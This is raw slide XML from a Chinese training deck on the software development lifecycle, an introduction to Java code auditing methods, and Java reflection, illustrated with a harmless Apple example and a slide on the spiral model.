              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块、数据库、界面、重要的业务逻辑实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>并对设计内容进行多次评审。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>现在的项目一般为多个端，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、手机端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安卓、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IOS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、小程序端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>微信、支付宝等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，这个就涉及到团队的协作与沟通在设计时还要考虑用户的交互以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>体验感，所以设计阶段非常重要。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>产出物：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文档，多端系统架构，数据库，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>界面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、系统开发：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>该阶段主要的目的是要将设计转换为实际代码的过程。一般管理人员会按照模块进行划分，然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>以及后端的开发人员进行编码、联调最终要形成单元测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>报告。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>产出物：代码、测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文档。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、系统测试：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试人员要根据不同的测试阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结合需求说明以及详细设计文档等对要测试的模块进行测试用例的编写包括正例，反例等。根据编写的测试用例对已经开发并且进行单元测试的模块进行用例测试。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>产出物：各个测试阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文档。</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案例分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交付：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在测试通过后，进入系统交付阶段，包括</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交付文档：准备相关的交付文档，如用户手册、安装指南、维护手册等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统部署：将系统部署到客户的环境中，确保系统可以正常运行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>产出物：手册、文档、系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、系统验收：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统验收是客户对交付系统进行检查和确认的过程，包括：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验收测试：客户根据验收标准对系统进行测试，确认系统功能和性能符合要求。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验收文档：记录验收结果，并形成验收报告，确认系统的最终交付。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>产出物：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文档。</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案例分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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en-US" altLang="zh-CN"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实施：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在系统验收通过后，进入系统实施阶段，包括：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户培训：对客户的用户进行培训，确保他们能够熟练使用新系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上线支持：在系统上线初期提供技术支持，解决用户在使用过程中遇到的问题。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后期维护：根据客户需求，进行系统的后续维护和更新，确保系统的长期稳定性和安全性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>产出物：培训记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等。</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idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>07</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>审计</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>审计</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t>引言：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>随着互联网的高速发展，各类新型 Web 攻击层出不穷。NIST（美国国家标准与技术研究院）的研究表明，在软件开发生命周期中，在软件发布以后进行修复的代价是在软件设计和编码阶段即进行修复所花代价的 30 倍，所以在软件系统发布后才发现系统缺陷，然后再去进行修复，这样的代价是很大的。如何在软件系统发布前找到 Web 应用系统存在的隐藏漏洞已成为众多企业普遍面临的问题。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对于渗透测试人员来说，掌握代码审计应是一项基本技能，只有懂得了漏洞的原理以及产生的过程，才能够根据具体漏洞环境的变化写出符合实际需求的攻击代码进行渗透。对于代码审计人员，只有充分挖掘当前代码中可能存在的安全问题，才能使开发人员了解其开发的应用系统可能会面临的威胁，并正确修复程序缺陷。在网络安全竞赛中有一个常见考点：由源代码泄露产生的代码审计。这在实际攻防渗透中也很常见，即由于系统配置或管理员的错误操作而导致系统的源代码泄露。除了源代码泄露，在实战中另外一个场景是目标站点使用了某套开源系统，这时我们除了查找此开源系统已公开的相关漏洞，还有一个十分有效的攻击手法是对此开源系统进行代码审计，以发现未知的漏洞，通过未知漏洞进行攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码审计需要通过阅读源代码的方式找到隐藏的安全问题，因此代码审计对渗透测试人员的编程能力有一定的要求，而最基础的要求是能够读懂代码逻辑、读懂代码的功能。</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>审计</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t>什么是代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>审计：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码审计(Code Audit)是一种以发现安全漏洞、程序错误和程序违规为目标的源代码分析技能。在实践过程中，可通过人工审查或者自动化工具的方式，对程序源代码进行检查和分析,发现这些源代码缺陷引发的安全漏洞，并提供代码修订措施和建议。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码审计的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>意义：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>随着Java Web应用越来越广泛，安全审计已经成为安全测试人员需要直面的工作。虽然PHP在中小型互联网企业仍占据一席之地，但主流的大型应用中，java仍是首选的开发语言，国内外大型企业大多以java作为核心的开发语言。因此对于安全从业者来说，java代码审计已经成为所需要掌握的关键技能。</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>审计</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537950" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对于代码审计常规分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法一般可分为以下三种：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（1）通读源代码：这种审计手法往往能够发现隐藏较深的安全问题，一般从程序的入口函数开始读。但其缺点也十分明显，需要通读整个源代码的逻辑，因此十分耗费时间。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（2）关键函数回溯：这种方法比第一种方法效率大大提升，但是很难发现隐藏极深的安全问题。对于关键函数回溯法，首先需定位到敏感函数以及参数，随后同步回溯参数的赋值过程，判断是否可控以及是否经过过滤等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（3）追踪功能点：这种方法需要审计人员有一定的渗透测试基础，根据自己的经验判断可能存在问题的路由或功能点，并针对该功能点进行通读。例如，文件上传漏洞可直接通过定位上传函数来发现。 </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en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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44780" y="1214120"/>
            <a:ext cx="11431905" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>动态语言在程序运行时，可以改变程序结构或变量类型如（Python, Ruby, JavaScript），但是Java有一定的动态性，可以通过反射机制、字节码操作获得类似动态语言的特性，Java语言又可以称为 “准动态语言”。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>什么是反射呢？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java 反射机制是在 运行状态中，对于任意一个类，都能够知道这个类的所有属性和方法；对于任意一个对象，都能够调用它的任意一个方法和属性；这种动态获取的信息以及动态调用对象的方法的功能称为 Java 语言的反射机制。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反射就是在运行时才知道要操作的类是什么，并且可以在运行时获取类的完整构造，并调用对应的方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>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-Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进阶</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940" y="1195070"/>
            <a:ext cx="5180965" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:t>反射之中包含了一个「反」字，所以想要解释反射就必须先从「正」开始解释。一般情况下，我们使用某个类时必定知道它是什么类，是用来做什么的。于是我们直接对这个类进行实例化，之后使用这个类对象进行操作</a:t>
            </a:r>
          </a:p>
          <a:p/>
          <a:p>
            <a:r>
              <a:t>Apple apple = new Apple(); //直接初始化，「正射」</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>apple.setPrice(4);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5442585" y="1194435"/>
            <a:ext cx="6561455" cy="5247005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反射则是一开始并不知道我要初始化的类对象是什么，自然也无法使用 new 关键字来创建对象了。这时候，我们使用 JDK 提供的反射 API 进行反射调用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Class clz = Class.forName("com.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>zcsz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>.reflect.Apple");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Method method = clz.getMethod("setPrice", int.class);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Constructor constructor = clz.getConstructor();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Object object = constructor.newInstance();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>method.invoke(object, 4);</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软件生命周期模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>螺旋模型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2393315"/>
            <a:ext cx="5749925" cy="216852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兼顾快速原型的迭代的特征以及瀑布模型的系统化与严格监控。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>引入了其他模型不具备的风险分析，使软件在无法排除重大风险时有机会停止，以减小损失。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>构建原型是螺旋模型用以减小风险的途径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6594475" y="1316990"/>
            <a:ext cx="4857750" cy="4649470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699135" y="5341620"/>
            <a:ext cx="5319395" cy="646430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
